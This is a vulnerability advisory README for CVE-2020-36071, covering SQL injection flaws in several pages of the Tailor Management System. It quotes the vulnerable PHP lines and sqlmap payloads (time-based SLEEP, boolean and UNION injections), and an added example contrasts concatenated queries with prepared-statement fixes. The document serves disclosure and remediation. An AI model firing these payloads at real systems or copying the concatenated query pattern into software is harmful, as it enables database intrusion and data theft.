CVE-2020-36071: CVE-s/README.md at main · Abdallah-Fouad-X/CVE-s

SQL injection vulnerability found in Tailor Management System v.1 allows a remote authenticated attacker to execute arbitrary code via the customer parameter of the email.php page.


CVE-s + Tailor Management System V.1

[Vulnerability Type]

SQL Injection

[Affected Component]

In email.php at line 50, $result = $pdo->query("SELECT email FROM customer WHERE fullname='$customer'"); interpolates the $customer parameter straight into the SQL text: the value is neither filtered nor bound through a prepared statement.

[Attack Type]

Remote

[Attack Vectors]

You have to be authenticated. Open the email.php page, fill in all the inputs with the necessary information, and intercept the request with Burp Suite; the request method is POST and the customer parameter is the injectable one. Save the request and run sqlmap on it to confirm the vulnerability. sqlmap output:

Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: customer=0' AND (SELECT 2532 FROM (SELECT(SLEEP(5)))ZLDl) AND 'Dfud'='Dfud&template=Your Clothes are ready for collection. Thanks for your patronage&message=Dear 0, Your Clothes are ready for collection. Thanks for your patronage

[Discoverer]

Abdallah Fouad, Bassam Assiri

[Vendor of Product]

SourceCodester

[Affected Product Code Base]

Tailor Management System V.1

RISK: High

[Vulnerability Type]

SQL Injection

[Affected Component]

Reviewing the source code: at line 41, $eid = $_GET["id"]; and at line 90, $oldd = $pdo->query("SELECT * FROM customer WHERE id='".$eid."'"); the id value is concatenated into the query and no validation is performed before it is executed.

[Attack Type]

Remote

[Attack Vectors]

After logging in, navigate to http://localhost/tailor/customeredit.php and edit the user data; the parameter is reflected in the URL as http://localhost/tailor/customeredit.php?id=1. Running sqlmap against that link reports the following:

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8449=8449 AND 'iurJ'='iurJ

Type: time-based blind
Title: MySQL < 5.0.12 OR time-based blind (heavy query)
Payload: id=1' OR 3412=BENCHMARK(5000000,MD5(0x67504658)) AND 'Vzxv'='Vzxv

Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-2894' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787671,0x526c664b74446c5277577653754f7146475152747377417975734579655658764766626e6869694a,0x7178787671),NULL,NULL-- pUIM

[Discoverer]

Abdallah Fouad, Bassam Assiri

[Vendor of Product]

SourceCodester

[Affected Product Code Base]

Tailor Management System V.1

RISK: High

[Vulnerability Type]

SQL Injection

[Affected Component]

In document.php, $detail = $_POST["detail"]; is read at line 43 and, with no validation between lines 43 and 57, used in the query executed at line 57: $res = $pdo->exec("INSERT INTO documents SET title='".$title."', detail='".$detail."', img='".$bgimg."'");

[Attack Type]

Remote

[Attack Vectors]

Log in and go to http://localhost/tailor/document.php, set the document title and send the request. Intercept the request with Burp Suite, save it, and pass it to sqlmap, which confirms that the vulnerability exists:

Parameter: MULTIPART #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
------WebKitFormBoundaryvizUXbIL1AEu2VY4
Content-Disposition: form-data; name="title"

------WebKitFormBoundaryvizUXbIL1AEu2VY4
Content-Disposition: form-data; name="detail"

aa' AND (SELECT 2393 FROM (SELECT(SLEEP(5)))JGfe) AND 'keIn'='keIn
------WebKitFormBoundaryvizUXbIL1AEu2VY4
Content-Disposition: form-data; name="bgimg"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryvizUXbIL1AEu2VY4--

[Discoverer]

Abdallah Fouad, Bassam Assiri

[Vendor of Product]

SourceCodester

[Affected Product Code Base]

Tailor Management System V.1

RISK: High

[Vulnerability Type]

SQL Injection

[Affected Component]

In document.php, $title = $_POST["title"]; is read at line 42 and, with no validation between lines 42 and 57, used in the query executed at line 57: $res = $pdo->exec("INSERT INTO documents SET title='".$title."', detail='".$detail."', img='".$bgimg."'");

[Attack Type]

Remote

[Discoverer]

Abdallah Fouad, Bassam Assiri

[Vendor of Product]

SourceCodester

[Affected Product Code Base]

Tailor Management System V.1

RISK: High

[Vulnerability Type]

SQL Injection

[Affected Component]

After reviewing the source code for the software, I found that orderadd.php inserts the data from the request in an unsafe way, without any validation: the query is built at line 45 and executed at line 54.
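Every component listed above (email.php, customeredit.php, document.php and orderadd.php) shares one defect: a request value is spliced into the SQL string that PDO then runs. The following PHP is an added example, not code from the Tailor Management System project or from the advisory authors. It uses an in-memory SQLite database with constructed tables and rows in place of the project's MySQL database (SQLite lacks MySQL's INSERT ... SET syntax, so the standard VALUES form is used), and puts the concatenated query beside the prepared-statement form that removes the injection.

```php
<?php
// Added example (not the project's code): the concatenated-query pattern from the
// advisory beside its prepared-statement replacement. Schema and rows are constructed;
// an in-memory SQLite database stands in for the project's MySQL database.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE customer (id INTEGER PRIMARY KEY, fullname TEXT, email TEXT)');
$pdo->exec('CREATE TABLE documents (id INTEGER PRIMARY KEY, title TEXT, detail TEXT, img TEXT)');
$pdo->exec("INSERT INTO customer (fullname, email) VALUES ('Alice Example', 'alice@example.invalid')");
$pdo->exec("INSERT INTO customer (fullname, email) VALUES ('Bob Example', 'bob@example.invalid')");

// Vulnerable form, mirroring email.php line 50: the request value becomes part of the
// SQL text, so a quote in the input changes the statement instead of being compared.
function lookupEmailUnsafe(PDO $pdo, string $customer): array
{
    $stmt = $pdo->query("SELECT email FROM customer WHERE fullname='$customer'");
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened form: the value travels separately from the statement as a bound
// parameter, so it can only ever be compared against fullname.
function lookupEmailSafe(PDO $pdo, string $customer): array
{
    $stmt = $pdo->prepare('SELECT email FROM customer WHERE fullname = :fullname');
    $stmt->execute([':fullname' => $customer]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// customeredit.php concatenates $_GET["id"] into the query; here the id is first
// validated as a plain non-negative integer string and then bound with an integer type.
function loadCustomerSafe(PDO $pdo, string $rawId): ?array
{
    if (!ctype_digit($rawId)) {
        return null;                       // reject anything that is not a plain integer
    }
    $stmt = $pdo->prepare('SELECT * FROM customer WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// document.php and orderadd.php build an INSERT from $_POST fields; every field is bound.
function insertDocumentSafe(PDO $pdo, string $title, string $detail, string $img): int
{
    $stmt = $pdo->prepare('INSERT INTO documents (title, detail, img) VALUES (:title, :detail, :img)');
    $stmt->execute([':title' => $title, ':detail' => $detail, ':img' => $img]);
    return (int) $pdo->lastInsertId();
}

// Constructed inputs containing a single quote, the character the advisory's findings
// hinge on. The unsafe lookup lets the quote rewrite the WHERE clause and returns rows
// for customers that were never asked for; the safe one finds no customer of that name.
$quotedName = "Alice Example' OR '1'='1";
printf("unsafe lookup: %d row(s)\n", count(lookupEmailUnsafe($pdo, $quotedName)));
printf("safe lookup:   %d row(s)\n", count(lookupEmailSafe($pdo, $quotedName)));
printf("safe lookup, exact name: %s\n", implode(',', lookupEmailSafe($pdo, 'Alice Example')));

var_dump(loadCustomerSafe($pdo, "1' OR 1=1") === null);   // rejected before any query runs
var_dump(loadCustomerSafe($pdo, '1')['fullname']);

$newId = insertDocumentSafe($pdo, "O'Brien order", "detail with ' quote", 'none.png');
$check = $pdo->prepare('SELECT title FROM documents WHERE id = :id');
$check->bindValue(':id', $newId, PDO::PARAM_INT);
$check->execute();
var_dump($check->fetchColumn());                          // the quote is stored as ordinary data
```

Run it with the php CLI (the pdo_sqlite extension must be enabled). The change to carry into the real code base is mechanical: each $pdo->query() or $pdo->exec() call that embeds a $_GET or $_POST value becomes $pdo->prepare() followed by execute() with the value bound, and a numeric id is validated before it is bound. Detection-wise, the concatenated form is easy to grep for in a review: any query string that contains a PHP variable or a ".$" concatenation next to a quote is a candidate.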

[Attack Type]

Remote

[Attack Vectors]

After logging in, go to http://localhost:8080/tailor/tailor/orderadd.php, fill out the whole form, intercept the request with Burp Suite, and run sqlmap with the injectable point in the POST body { customer=&desc=test&date_received=&amount=1&paid=1&completed=Yes&date_collected=2020-12-26 }, i.e. the customer parameter. sqlmap output:

(custom) POST parameter '#1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 93 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: customer=' AND (SELECT 9665 FROM (SELECT(SLEEP(5)))QEDW) AND 'dcCY'='dcCY&desc=X&date_received=&amount=1&paid=1&completed=Yes&date_collected=2020-12-26

[Discoverer]

Abdallah Fouad Mohamed

[Vendor of Product]

SourceCodester

[Affected Product Code Base]

Tailor Management System V.1

RISK: High

Impact: The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.
